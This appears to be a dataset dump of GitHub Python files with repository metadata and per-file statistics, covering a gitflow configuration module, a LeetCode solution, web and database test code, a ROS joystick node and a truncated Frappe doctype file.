hexsha (stringlengths 40-40) | size (int64 5-2.06M) | ext (stringclasses, 10 values) | lang (stringclasses, 1 value) | max_stars_repo_path (stringlengths 3-248) | max_stars_repo_name (stringlengths 5-125) | max_stars_repo_head_hexsha (stringlengths 40-78) | max_stars_repo_licenses (listlengths 1-10) | max_stars_count (int64 1-191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24 ⌀) | max_issues_repo_path (stringlengths 3-248) | max_issues_repo_name (stringlengths 5-125) | max_issues_repo_head_hexsha (stringlengths 40-78) | max_issues_repo_licenses (listlengths 1-10) | max_issues_count (int64 1-67k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24 ⌀) | max_forks_repo_path (stringlengths 3-248) | max_forks_repo_name (stringlengths 5-125) | max_forks_repo_head_hexsha (stringlengths 40-78) | max_forks_repo_licenses (listlengths 1-10) | max_forks_count (int64 1-105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24 ⌀) | content (stringlengths 5-2.06M) | avg_line_length (float64 1-1.02M) | max_line_length (int64 3-1.03M) | alphanum_fraction (float64 0-1) | count_classes (int64 0-1.6M) | score_classes (float64 0-1) | count_generators (int64 0-651k) | score_generators (float64 0-1) | count_decorators (int64 0-990k) | score_decorators (float64 0-1) | count_async_functions (int64 0-235k) | score_async_functions (float64 0-1) | count_documentation (int64 0-1.04M) | score_documentation (float64 0-1) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
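The header above lists one record per source file: repository metadata (path, name, head commit, licenses, and star/issue/fork counts with their event dates; ⌀ marks nullable fields), the file content itself, and per-file statistics with quality scores. As a minimal sketch of how the score columns fit together (assuming rows have already been parsed into dictionaries keyed by the column names; the function name and the records variable are hypothetical, not part of this dump):

def well_documented_python(records, min_doc_score=0.1):
    # Yield (repo, path, source) for Python files whose documentation score
    # meets the threshold; every key used here comes from the schema above.
    for row in records:
        if row["lang"] == "Python" and row["score_documentation"] >= min_doc_score:
            yield row["max_stars_repo_name"], row["max_stars_repo_path"], row["content"]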
f1b7cdef9de310ce5a7fb0146da43f000e1ce55f | 18,861 | py | Python | gitflow/context.py | abacusresearch/gitflow | 81ea7f5d468f9b128cd593f62972f13352bd3a63 | ["MIT"] | null | null | null | gitflow/context.py | abacusresearch/gitflow | 81ea7f5d468f9b128cd593f62972f13352bd3a63 | ["MIT"] | null | null | null | gitflow/context.py | abacusresearch/gitflow | 81ea7f5d468f9b128cd593f62972f13352bd3a63 | ["MIT"] | null | null | null |
import atexit
import os
import re
import shutil
from enum import Enum
from typing import List, Optional
import collections
from gitflow import cli, const, repotools, _, utils
from gitflow.common import Result
from gitflow.const import VersioningScheme
from gitflow.properties import PropertyIO
from gitflow.repotools import RepoContext
from gitflow.version import VersionMatcher, VersionConfig
class BuildStepType(Enum):
ASSEMBLE = 'assemble',
TEST = 'test',
INTEGRATION_TEST = 'integration_test',
PACKAGE = 'package',
DEPLOY = 'deploy'
class BuildLabels(Enum):
OPENSHIFT_S2I_TEST = 'com.openshift:s2i'
class BuildStep(object):
name: str = None
commands: list = None
"""a list of command arrays"""
labels: set = None
"""contains labels for mapping to the ci tasks, effectively extending the label set in the enclosing stage"""
class BuildStage(object):
type: str
steps: list = None
labels: list = None
"""contains labels for mapping to ci tasks"""
def __init__(self):
self.steps = list()
self.labels = list()
class Config(object):
# project properties
property_file: str = None
sequence_number_property: str = None
version_property: str = None
# validation mode
strict_mode = True
# version
version_config: VersionConfig = None
# repo
remote_name = None
release_branch_base = None
dev_branch_types = ['feature', 'integration',
'fix', 'chore', 'doc', 'issue']
prod_branch_types = ['fix', 'chore', 'doc', 'issue']
# build config
version_change_actions: List[List[str]] = None
build_stages: list = None
# hard config
# TODO checks on merge base
allow_shared_release_branch_base = False
# TODO distinction of commit-based and purely tag based increments
allow_qualifier_increments_within_commit = True
# TODO config var & CLI option
# requires clean workspace and temporary detachment from branches to be pushed
push_to_local = False
pull_after_bump = True
# properties
@property
def sequential_versioning(self) -> bool:
return self.version_config.versioning_scheme == VersioningScheme.SEMVER_WITH_SEQ
@property
def tie_sequential_version_to_semantic_version(self) -> bool:
return self.version_config.versioning_scheme == VersioningScheme.SEMVER_WITH_SEQ
@property
def commit_version_property(self) -> bool:
return self.version_property is not None
@property
def commit_sequential_version_property(self) -> bool:
return self.sequence_number_property is not None \
and self.sequential_versioning
@property
def requires_property_commits(self) -> bool:
return self.commit_version_property \
or self.commit_sequential_version_property
class AbstractContext(object):
result: Result = None
def __init__(self):
self.result = Result()
def warn(self, message, reason):
self.result.warn(message, reason)
def error(self, exit_code, message, reason, throw: bool = False):
self.result.error(exit_code, message, reason, throw)
def fail(self, exit_code, message, reason):
self.result.fail(exit_code, message, reason)
def add_subresult(self, subresult):
self.result.add_subresult(subresult)
def has_errors(self):
return self.result.has_errors()
def abort_on_error(self):
return self.result.abort_on_error()
def abort(self):
return self.result.abort()
class Context(AbstractContext):
config: Config = None
repo: RepoContext = None
# args
args = None
root = None
batch = False
assume_yes = False
dry_run = False
verbose = const.ERROR_VERBOSITY
pretty = False
# matchers
release_base_branch_matcher: VersionMatcher = None
release_branch_matcher: VersionMatcher = None
work_branch_matcher: VersionMatcher = None
version_tag_matcher: VersionMatcher = None
discontinuation_tag_matcher: VersionMatcher = None
# resources
temp_dirs: list = None
clones: list = None
# misc
git_version: str = None
def __init__(self):
super().__init__()
atexit.register(self.cleanup)
@staticmethod
def create(args: dict, result_out: Result) -> 'Context':
context = Context()
context.config: Config = Config()
if args is not None:
context.args = args
context.batch = context.args['--batch']
context.assume_yes = context.args.get('--assume-yes')
context.dry_run = context.args.get('--dry-run')
# TODO remove this workaround
context.verbose = (context.args['--verbose'] + 1) // 2
context.pretty = context.args['--pretty']
else:
context.args = dict()
# configure CLI
cli.set_allow_color(not context.batch)
# initialize repo context and attempt to load the config file
if '--root' in context.args and context.args['--root'] is not None:
context.root = context.args['--root']
context.repo = RepoContext()
context.repo.dir = context.root
context.repo.verbose = context.verbose
context.git_version = repotools.git_version(context.repo)
# context.repo.use_root_dir_arg = semver.compare(context.git_version, "2.9.0") >= 0
context.repo.use_root_dir_arg = False
repo_root = repotools.git_rev_parse(context.repo, '--show-toplevel')
# None when invalid or bare
if repo_root is not None:
context.repo.dir = repo_root
if context.verbose >= const.TRACE_VERBOSITY:
cli.print("--------------------------------------------------------------------------------")
cli.print("refs in {repo}:".format(repo=context.repo.dir))
cli.print("--------------------------------------------------------------------------------")
for ref in repotools.git_list_refs(context.repo):
cli.print(repr(ref))
cli.print("--------------------------------------------------------------------------------")
config_dir = context.repo.dir
else:
context.repo = None
config_dir = context.root
gitflow_config_file: Optional[str] = None
if context.args['--config'] is not None:
gitflow_config_file = os.path.join(config_dir, context.args['--config'])
if gitflow_config_file is None:
result_out.fail(os.EX_DATAERR,
_("the specified config file does not exist or is not a regular file: {path}.")
.format(path=repr(gitflow_config_file)),
None
)
else:
for config_filename in const.DEFAULT_CONFIGURATION_FILE_NAMES:
path = os.path.join(config_dir, config_filename)
if os.path.exists(path):
gitflow_config_file = path
break
if gitflow_config_file is None:
result_out.fail(os.EX_DATAERR,
_("config file not found.")
.format(path=repr(gitflow_config_file)),
_("Default config files are\n:{list}")
.format(list=const.DEFAULT_CONFIGURATION_FILE_NAMES)
)
if context.verbose >= const.TRACE_VERBOSITY:
cli.print("gitflow_config_file: " + gitflow_config_file)
with open(gitflow_config_file) as json_file:
config = PropertyIO.get_instance_by_filename(gitflow_config_file).from_stream(json_file)
else:
            config = dict()  # a plain dict so the .get() calls below still work when no config file was loaded
build_config_json = config.get(const.CONFIG_BUILD)
context.config.version_change_actions = config.get(const.CONFIG_ON_VERSION_CHANGE, [])
context.config.build_stages = list()
if build_config_json is not None:
stages_json = build_config_json.get('stages')
if stages_json is not None:
for stage_key, stage_json in stages_json.items():
stage = BuildStage()
if isinstance(stage_json, dict):
stage.type = stage_json.get('type') or stage_key
if stage.type not in const.BUILD_STAGE_TYPES:
result_out.fail(
os.EX_DATAERR,
_("Configuration failed."),
_("Invalid build stage type {key}."
.format(key=repr(stage.type)))
)
stage.name = stage_json.get('name') or stage_key
stage_labels = stage_json.get('labels')
if isinstance(stage_labels, list):
stage.labels.extend(stage_labels)
else:
stage.labels.append(stage_labels)
stage_steps_json = stage_json.get('steps')
if stage_steps_json is not None:
for step_key, step_json in stage_steps_json.items():
step = BuildStep()
if isinstance(step_json, dict):
step.name = step_json.get('name') or step_key
step.commands = step_json.get('commands')
stage_labels = stage_json.get('labels')
if isinstance(stage_labels, list):
stage.labels.extend(stage_labels)
else:
stage.labels.append(stage_labels)
elif isinstance(step_json, list):
step.name = step_key
step.type = step_key
step.commands = step_json
else:
result_out.fail(
os.EX_DATAERR,
_("Configuration failed."),
_("Invalid build step definition {type} {key}."
.format(type=repr(type(step_json)), key=repr(step_key)))
)
stage.steps.append(step)
elif isinstance(stage_json, list):
stage.type = stage_key
stage.name = stage_key
if len(stage_json):
step = BuildStep()
step.name = '#'
step.commands = stage_json
stage.steps.append(step)
else:
result_out.fail(
os.EX_DATAERR,
_("Configuration failed."),
_("Invalid build stage definition {key}."
.format(key=repr(stage_key)))
)
context.config.build_stages.append(stage)
context.config.build_stages.sort(key=utils.cmp_to_key(lambda stage_a, stage_b:
const.BUILD_STAGE_TYPES.index(stage_a.type)
- const.BUILD_STAGE_TYPES.index(stage_b.type)
),
reverse=False
)
# project properties config
context.config.property_file = config.get(const.CONFIG_PROJECT_PROPERTY_FILE)
if context.config.property_file is not None:
context.config.property_file = os.path.join(context.root, context.config.property_file)
context.config.version_property = config.get(const.CONFIG_VERSION_PROPERTY)
context.config.sequence_number_property = config.get(
const.CONFIG_SEQUENCE_NUMBER_PROPERTY)
context.config.version_property = config.get(
const.CONFIG_VERSION_PROPERTY)
property_names = [property for property in
[context.config.sequence_number_property, context.config.version_property] if
property is not None]
duplicate_property_names = [item for item, count in collections.Counter(property_names).items() if count > 1]
if len(duplicate_property_names):
result_out.fail(os.EX_DATAERR, _("Configuration failed."),
_("Duplicate property names: {duplicate_property_names}").format(
duplicate_property_names=', '.join(duplicate_property_names))
)
# version config
context.config.version_config = VersionConfig()
versioning_scheme = config.get(const.CONFIG_VERSIONING_SCHEME, const.DEFAULT_VERSIONING_SCHEME)
if versioning_scheme not in const.VERSIONING_SCHEMES:
result_out.fail(os.EX_DATAERR, _("Configuration failed."),
_("The versioning scheme {versioning_scheme} is invalid.").format(
versioning_scheme=utils.quote(versioning_scheme, '\'')))
context.config.version_config.versioning_scheme = const.VERSIONING_SCHEMES[versioning_scheme]
if context.config.version_config.versioning_scheme == VersioningScheme.SEMVER:
qualifiers = config.get(const.CONFIG_VERSION_TYPES, const.DEFAULT_PRE_RELEASE_QUALIFIERS)
if isinstance(qualifiers, str):
qualifiers = [qualifier.strip() for qualifier in qualifiers.split(",")]
if qualifiers != sorted(qualifiers):
result_out.fail(
os.EX_DATAERR,
_("Configuration failed."),
_("Pre-release qualifiers are not specified in ascending order.")
)
context.config.version_config.qualifiers = qualifiers
context.config.version_config.initial_version = const.DEFAULT_INITIAL_VERSION
elif context.config.version_config.versioning_scheme == VersioningScheme.SEMVER_WITH_SEQ:
context.config.version_config.qualifiers = None
context.config.version_config.initial_version = const.DEFAULT_INITIAL_SEQ_VERSION
else:
context.fail(os.EX_CONFIG, "configuration error", "invalid versioning scheme")
# branch config
context.config.remote_name = "origin"
context.config.release_branch_base = config.get(const.CONFIG_RELEASE_BRANCH_BASE,
const.DEFAULT_RELEASE_BRANCH_BASE)
remote_prefix = repotools.create_ref_name(const.REMOTES_PREFIX, context.config.remote_name)
context.release_base_branch_matcher = VersionMatcher(
[const.LOCAL_BRANCH_PREFIX, remote_prefix],
None,
re.escape(context.config.release_branch_base),
)
context.release_branch_matcher = VersionMatcher(
[const.LOCAL_BRANCH_PREFIX, remote_prefix],
config.get(
const.CONFIG_RELEASE_BRANCH_PREFIX,
const.DEFAULT_RELEASE_BRANCH_PREFIX),
config.get(
const.CONFIG_RELEASE_BRANCH_PATTERN,
const.DEFAULT_RELEASE_BRANCH_PATTERN),
)
context.work_branch_matcher = VersionMatcher(
[const.LOCAL_BRANCH_PREFIX, remote_prefix],
[const.BRANCH_PREFIX_DEV, const.BRANCH_PREFIX_PROD],
config.get(
const.CONFIG_WORK_BRANCH_PATTERN,
const.DEFAULT_WORK_BRANCH_PATTERN),
)
context.version_tag_matcher = VersionMatcher(
[const.LOCAL_TAG_PREFIX],
config.get(
const.CONFIG_VERSION_TAG_PREFIX,
const.DEFAULT_VERSION_TAG_PREFIX),
config.get(
const.CONFIG_VERSION_TAG_PATTERN,
const.DEFAULT_SEMVER_VERSION_TAG_PATTERN
if context.config.version_config.versioning_scheme == VersioningScheme.SEMVER
else const.DEFAULT_SEMVER_WITH_SEQ_VERSION_TAG_PATTERN)
)
context.version_tag_matcher.group_unique_code = None \
if context.config.version_config.versioning_scheme == VersioningScheme.SEMVER \
else 'prerelease_type'
context.discontinuation_tag_matcher = VersionMatcher(
[const.LOCAL_TAG_PREFIX],
config.get(
const.CONFIG_DISCONTINUATION_TAG_PREFIX,
const.DEFAULT_DISCONTINUATION_TAG_PREFIX),
config.get(
const.CONFIG_DISCONTINUATION_TAG_PATTERN,
const.DEFAULT_DISCONTINUATION_TAG_PATTERN),
None
)
return context
def add_temp_dir(self, dir):
if self.temp_dirs is None:
self.temp_dirs = list()
self.temp_dirs.append(dir)
pass
def get_release_branches(self, reverse: bool = True):
release_branches = list(filter(
lambda branch_ref: self.release_branch_matcher.format(
branch_ref.name) is not None,
repotools.git_list_refs(self.repo,
repotools.create_ref_name(const.REMOTES_PREFIX, self.config.remote_name),
const.LOCAL_BRANCH_PREFIX)
))
release_branches.sort(
reverse=reverse,
key=self.release_branch_matcher.key_func
)
return release_branches
def cleanup(self):
atexit.unregister(self.cleanup)
if self.temp_dirs is not None:
for temp_dir in self.temp_dirs:
if self.verbose >= const.DEBUG_VERBOSITY:
cli.print("deleting temp dir: " + temp_dir)
shutil.rmtree(temp_dir)
self.temp_dirs.clear()
if self.clones is not None:
for clone in self.clones:
clone.cleanup()
self.clones.clear()
def __del__(self):
self.cleanup()
| 38.64959 | 117 | 0.564233 | 18,444 | 0.977891 | 0 | 0 | 14,012 | 0.742909 | 0 | 0 | 2,061 | 0.109273 |
f1b87ee915b0b88ddd9829337e7a6f4316b55ca5 | 705 | py | Python | LeetCode/1219_Path_with_Maximum_Gold/main.py | sungmen/Acmicpc_Solve | 0298a6aec84993a4d8767bd2c00490b7201e06a4 | ["MIT"] | 1 | 2020-07-08T23:16:19.000Z | 2020-07-08T23:16:19.000Z | LeetCode/1219_Path_with_Maximum_Gold/main.py | sungmen/Acmicpc_Solve | 0298a6aec84993a4d8767bd2c00490b7201e06a4 | ["MIT"] | 1 | 2020-05-16T03:12:24.000Z | 2020-05-16T03:14:42.000Z | LeetCode/1219_Path_with_Maximum_Gold/main.py | sungmen/Acmicpc_Solve | 0298a6aec84993a4d8767bd2c00490b7201e06a4 | ["MIT"] | 2 | 2020-05-16T03:25:16.000Z | 2021-02-10T16:51:25.000Z |
from typing import List  # needed for the List annotation in getMaximumGold
class Solution:
def __init__(self):
self.m = 0
self.n = 0
def dfs(self, y, x, grid) -> int:
if y < 0 or y >= self.m or x < 0 or x >= self.n or grid[y][x] == 0:
return 0
res = 0
tmpGrid = grid[y][x]
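        # temporarily zero this cell so the recursive calls below cannot revisit it; it is restored after the loop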
grid[y][x] = 0
for y_, x_ in ((y, x - 1), (y, x + 1), (y - 1, x), (y + 1, x)):
res = max(self.dfs(y_, x_, grid), res)
grid[y][x] = tmpGrid
return grid[y][x] + res
def getMaximumGold(self, grid: List[List[int]]) -> int:
self.m = len(grid)
self.n = len(grid[0])
res = max(self.dfs(i, j, grid) for i in range(self.m) for j in range(self.n))
return res
| 32.045455 | 85 | 0.453901 | 705 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
f1b884785bf603bff438ce57a6af789de6bc8891 | 2,307 | py | Python | test/test_modify_contact.py | peruana80/python_training | 0070bdc07b22d80594c029984c9967e56ba51951 | ["Apache-2.0"] | null | null | null | test/test_modify_contact.py | peruana80/python_training | 0070bdc07b22d80594c029984c9967e56ba51951 | ["Apache-2.0"] | null | null | null | test/test_modify_contact.py | peruana80/python_training | 0070bdc07b22d80594c029984c9967e56ba51951 | ["Apache-2.0"] | null | null | null |
from model.contact import Contact
from random import randrange
def test_modify_contact_name(app, db, check_ui):
    if len(db.get_contact_list()) == 0:
        app.contact.create(Contact(first_name="test"))
old_contacts = db.get_contact_list()
index = randrange(len(old_contacts))
contact = Contact(first_name="Zmodyfikuj imie", middle_name="Zmodyfikuj drugie imie", last_name="Zmodyfikuj nazwisko", nickname="Zmodyfikuj ksywe", title="Zmodyfikuj tytul",
company="Zmodyfikuj firme", address="Zmodyfikuj adres", home_number="Zmodyfikuj_telefon_domowy", mobile_number="Zmodyfikuj_telefon_komorkowy",
work_number="Zmodyfikuj_telefon_sluzbowy", fax="Zmodyfikuj fax", email="Zmodyfikuj email", email2="Zmodyfikuj email2", email3="Zmodyfikuj email3",
homepage="Zmodyfikuj strone domowa", byear="1990", ayear="2000", address_2="Zmodyfikuj drugi adres", phone2="Zmodyfikuj_telefon domowy 2",
notes="Zmodyfikuj notatki")
contact.id=old_contacts[index].id
app.contact.modify_contact_by_id(contact)
new_contacts = db.get_contact_list()
assert len(old_contacts) == len(new_contacts)
old_contacts[index] = contact
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui:
new_contacts = app.contact.get_contact_list()
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
#def test_modify_first_contact_first_name(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(first_name="test"))
# old_contacts = app.contact.get_contact_list()
# app.contact.modify_first_contact(Contact(first_name="zmodyfikuj imie"))
# new_contacts = app.contact.get_contact_list()
# assert len(old_contacts) == len(new_contacts)
#def test_modify_first_contact_email(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(first_name="test"))
# old_contacts = app.contact.get_contact_list()
# app.contact.modify_first_contact(Contact(last_name="Zmodyfikuj nazwisko"))
# new_contacts = app.contact.get_contact_list()
# assert len(old_contacts) == len(new_contacts)
| 56.268293 | 186 | 0.702211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,129 | 0.48938 |
f1b8db0ca9074a5d55378aaf5be9d198fcaa6a0b | 734 | py | Python | base.py | oknalv/linky | 78fba19946e2212b10f3d1a5b27c7d9329556290 | ["MIT"] | null | null | null | base.py | oknalv/linky | 78fba19946e2212b10f3d1a5b27c7d9329556290 | ["MIT"] | null | null | null | base.py | oknalv/linky | 78fba19946e2212b10f3d1a5b27c7d9329556290 | ["MIT"] | null | null | null |
import webapp2
from webapp2_extras import sessions
class BaseHandler(webapp2.RequestHandler):
def dispatch(self):
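        # bind the session store to this request and make sure sessions are saved even if the handler raises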
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
self.session_store.save_sessions(self.response)
@webapp2.cached_property
def session(self):
return self.session_store.get_session()
def set_flash(self, type, message_tag):
if not self.session.get("flash"):
self.session["flash"] = []
self.session["flash"].append([type, message_tag])
def get_flash(self):
ret = self.session.get("flash")
self.session["flash"] = []
return ret
| 29.36 | 69 | 0.647139 | 682 | 0.929155 | 0 | 0 | 95 | 0.129428 | 0 | 0 | 35 | 0.047684 |
f1b9ea9a68748f5299174c8b988d634a02fb6fda | 6,999 | py | Python | tests/test_helpers.py | albertoalcolea/dbhelpers | c65f77a750cf46874ae7b5b0e6d4930e9df729af | ["Apache-2.0"] | 2 | 2015-10-31T20:36:22.000Z | 2021-10-05T12:08:10.000Z | tests/test_helpers.py | albertoalcolea/dbhelpers | c65f77a750cf46874ae7b5b0e6d4930e9df729af | ["Apache-2.0"] | null | null | null | tests/test_helpers.py | albertoalcolea/dbhelpers | c65f77a750cf46874ae7b5b0e6d4930e9df729af | ["Apache-2.0"] | null | null | null |
import unittest
try:
from unittest.mock import Mock, call
except ImportError:
from mock import Mock, call
from dbhelpers import cm_cursor, fetchiter, fetchone_nt, fetchmany_nt, fetchall_nt, fetchiter_nt
class HelpersTestCase(unittest.TestCase):
def test_cm_cursor(self):
"""
Creates a context manager for a cursor and it is able to commit on exit.
"""
conn = Mock(spec=['cursor', 'commit', 'rollback'])
cursor_mock = Mock()
conn.cursor = Mock(return_value=cursor_mock)
conn.commit = Mock()
conn.rollback = Mock()
# Commit on exit
with cm_cursor(conn) as cursor:
self.assertEqual(cursor, cursor_mock)
self.assertTrue(conn.commit.called)
self.assertFalse(conn.rollback.called)
conn.commit.reset_mock()
# Disable auto commit
with cm_cursor(conn, commit=False) as cursor:
self.assertEqual(cursor, cursor_mock)
self.assertFalse(conn.commit.called)
self.assertFalse(conn.rollback.called)
# If exception no commit
def test_with_exc(conn, commit=True):
with cm_cursor(conn, commit=commit) as cursor:
raise Exception()
# If exception and commit=True, call rollback
self.assertRaises(Exception, test_with_exc, conn=conn, commit=True)
self.assertFalse(conn.commit.called)
self.assertTrue(conn.rollback.called)
conn.rollback.reset_mock()
# If exception and commit=False, no call commit nor rollback
self.assertRaises(Exception, test_with_exc, conn=conn, commit=False)
self.assertFalse(conn.commit.called)
self.assertFalse(conn.rollback.called)
def test_fetchiter(self):
cursor = Mock()
def test_iterator(cursor, use_server_cursor=False, **kwargs):
cursor.fetchmany = Mock(return_value=[1,2,3])
num_it = 0
for row in fetchiter(cursor, **kwargs):
if num_it == 3:
raise StopIteration
self.assertIn(row, [1,2,3])
num_it += 1
if row == 3:
# Stop
if use_server_cursor:
cursor.fetchall = Mock(return_value=[])
else:
cursor.fetchmany = Mock(return_value=[])
self.assertEqual(num_it, 3)
# Standard
test_iterator(cursor)
# Size
test_iterator(cursor, size=2)
cursor.fetchmany.assert_called_with(2)
# Batch
cursor.fetchmany = Mock(return_value=[1,2])
for row in fetchiter(cursor, batch=True):
self.assertEqual(row, [1,2])
# Stop
cursor.fetchmany = Mock(return_value=[])
# Server cursor
cursor.execute = Mock()
cursor.fetchall = Mock(return_value=[1,2,3])
test_iterator(cursor, use_server_cursor=True, size=10, server_cursor='C')
calls = [call("FETCH %s FROM C", (10,))] * 2
cursor.execute.assert_has_calls(calls)
def test_fetchone_nt(self):
cursor = Mock()
cursor.description = (('id', 3, 2, 11, 11, 0, 0), ('status', 253, 7, 80, 80, 0, 0))
cursor.fetchone = Mock(return_value=(34, 'info'))
r = fetchone_nt(cursor)
self.assertEqual(r.__class__.__name__, 'Results')
self.assertEqual(r.id, 34)
self.assertEqual(r.status, 'info')
def test_fetchmany_nt(self):
cursor = Mock()
cursor.description = (('id', 3, 2, 11, 11, 0, 0), ('status', 253, 7, 80, 80, 0, 0))
cursor.fetchmany = Mock(return_value=((34, 'info'), (99, 'warning')))
r = fetchmany_nt(cursor)
self.assertEqual(r.__class__.__name__, 'list')
self.assertEqual(r[0].__class__.__name__, 'Results')
self.assertEqual(r[0].id, 34)
self.assertEqual(r[0].status, 'info')
self.assertEqual(r[1].__class__.__name__, 'Results')
self.assertEqual(r[1].id, 99)
self.assertEqual(r[1].status, 'warning')
def test_fetchall_nt(self):
cursor = Mock()
cursor.description = (('id', 3, 2, 11, 11, 0, 0), ('status', 253, 7, 80, 80, 0, 0))
cursor.fetchall = Mock(return_value=((34, 'info'), (99, 'warning')))
r = fetchall_nt(cursor)
self.assertEqual(r.__class__.__name__, 'list')
self.assertEqual(r[0].__class__.__name__, 'Results')
self.assertEqual(r[0].id, 34)
self.assertEqual(r[0].status, 'info')
self.assertEqual(r[1].__class__.__name__, 'Results')
self.assertEqual(r[1].id, 99)
self.assertEqual(r[1].status, 'warning')
def test_fetchiter_nt(self):
cursor = Mock()
cursor.description = (('id', 3, 2, 11, 11, 0, 0), ('status', 253, 7, 80, 80, 0, 0))
# Standard
cursor.fetchmany = Mock(return_value=((34, 'info'), (99, 'warning')))
num_it = 0
for row in fetchiter_nt(cursor):
self.assertEqual(row.__class__.__name__, 'Results')
if num_it == 0:
self.assertEqual(row.id, 34)
self.assertEqual(row.status, 'info')
if num_it == 1:
self.assertEqual(row.id, 99)
self.assertEqual(row.status, 'warning')
if num_it == 2:
raise StopIteration
num_it += 1
if num_it == 2:
cursor.fetchmany = Mock(return_value=[])
self.assertEqual(num_it, 2)
# Batch
cursor.fetchmany = Mock(return_value=((34, 'info'), (99, 'warning')))
num_it = 0
for row in fetchiter_nt(cursor, batch=True):
self.assertEqual(row.__class__.__name__, 'list')
self.assertEqual(row[0].__class__.__name__, 'Results')
self.assertEqual(row[0].id, 34)
self.assertEqual(row[0].status, 'info')
self.assertEqual(row[1].__class__.__name__, 'Results')
self.assertEqual(row[1].id, 99)
self.assertEqual(row[1].status, 'warning')
if num_it == 1:
raise StopIteration
num_it += 1
if num_it == 1:
cursor.fetchmany = Mock(return_value=[])
self.assertEqual(num_it, 1)
# Server cursor
cursor.fetchall = Mock(return_value=((34, 'info'), (99, 'warning')))
num_it = 0
for row in fetchiter_nt(cursor, server_cursor='C'):
self.assertEqual(row.__class__.__name__, 'Results')
if num_it == 0:
self.assertEqual(row.id, 34)
self.assertEqual(row.status, 'info')
if num_it == 1:
self.assertEqual(row.id, 99)
self.assertEqual(row.status, 'warning')
if num_it == 2:
raise StopIteration
num_it += 1
if num_it == 2:
cursor.fetchall = Mock(return_value=[])
self.assertEqual(num_it, 2)
| 38.456044 | 96 | 0.570796 | 6,784 | 0.969281 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.1003 |
f1baa95b451bcaf546bfb42baf9ea8122be52ea7 | 2,641 | py | Python | scripts/joystick_node.py | kscottz/owi_arm | a08f1ed8a5bccfe8cca5a1fd1829beca15a1060f | ["BSD-2-Clause"] | null | null | null | scripts/joystick_node.py | kscottz/owi_arm | a08f1ed8a5bccfe8cca5a1fd1829beca15a1060f | ["BSD-2-Clause"] | null | null | null | scripts/joystick_node.py | kscottz/owi_arm | a08f1ed8a5bccfe8cca5a1fd1829beca15a1060f | ["BSD-2-Clause"] | null | null | null |
#!/usr/bin/env python
# THIS SHEBANG IS REALLY REALLY IMPORTANT
import rospy
import roscpp
import numpy as np
from sensor_msgs.msg import Joy
from std_msgs.msg import Int16MultiArray
class JoystickNode(object):
def __init__(self):
# put away our toys cleanly
rospy.on_shutdown(self.shutdown)
self.pub = rospy.Publisher('robot', Int16MultiArray, queue_size=1)
# subscribe to the joy and state messages
# format is topic, message type, callback function
rospy.Subscriber("/joy", Joy, self.do_it)
rospy.Subscriber("/state", Int16MultiArray, self.update_state)
rospy.init_node('joystick_node')
# our internal state message
self.state = [0,0,0,0,0]
# tell ros to chill unless we get a message.
rospy.spin()
def update_state(self,msg):
# update our internal state every time the robot posts an update
self.state = msg.data
def do_it(self,msg):
# Update our state
if( self.state is None ):
self.state = [0,0,0,0,0]
m1 = self.state[1]
m2 = self.state[2]
m3 = self.state[3]
m4 = self.state[4]
step = 5
# Update our state from our buttons
if(msg.buttons[1] == 1 ):
m1+=step
elif( msg.buttons[2] == 1 ):
m1-=step
if(msg.buttons[0] == 1 ):
m2+=step
elif( msg.buttons[3] ==1 ):
m2-=step
if(msg.axes[-1] > 0 ):
m3+=step
elif( msg.axes[-1] < 0 ):
m3-=step
if(msg.axes[-2] > 0 ):
m4+=step
elif( msg.axes[-2] < 0 ):
m4-=step
# check for updates
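        # clamp every motor target to its allowed range (motor 3 is limited to 0-120) before comparing with the current state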
data = [self.state[0],
int(np.clip(m1,0,180)),
int(np.clip(m2,0,180)),
int(np.clip(m3,0,120)),
int(np.clip(m4,0,180))]
change = any([abs(a-b)>0 for a,b in zip(data,self.state)])
self.state = data
# if there is a change
if( change ):
# Set the new position out on /robot
out = Int16MultiArray()
rospy.loginfo("sending {0}.".format(data))
out.data = data
self.pub.publish(out)
def shutdown(self):
data = [0,0,0,0]
out = Int16MultiArray()
        print("sending {0}.".format(data))
        out.data = data
        self.pub.publish(out)
if __name__ == '__main__':
try:
# boiler plate to spin up a node.
rospy.init_node('joystick_node')
node = JoystickNode()
except rospy.ROSInterruptException:
rospy.logwarn('ERROR!!!')
| 31.440476 | 74 | 0.540704 | 2,229 | 0.843998 | 0 | 0 | 0 | 0 | 0 | 0 | 583 | 0.22075 |
f1bc287fa4269a85fe5cdf284f15691d29943f53 | 650 | py | Python | nomiapp/nomiapp/doctype/configuracion_isr/configuracion_isr.py | YefriTavarez/NomiApp | a532ae7a3871ee91ec6f17b4b46ba67db7a056b5 | ["MIT"] | 1 | 2016-12-29T13:58:28.000Z | 2016-12-29T13:58:28.000Z | nomiapp/nomiapp/doctype/configuracion_isr/configuracion_isr.py | YefriTavarez/NomiApp | a532ae7a3871ee91ec6f17b4b46ba67db7a056b5 | ["MIT"] | null | null | null | nomiapp/nomiapp/doctype/configuracion_isr/configuracion_isr.py | YefriTavarez/NomiApp | a532ae7a3871ee91ec6f17b4b46ba67db7a056b5 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Soldeva, SRL and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class ConfiguracionISR(Document):
pass
@frappe.whitelist()
def getRangosISR():
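    # read the from*/to* range boundaries stored in the 'Configuracion ISR' Singles doctype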
return frappe.db.sql("SELECT field, value \
FROM `tabSingles` \
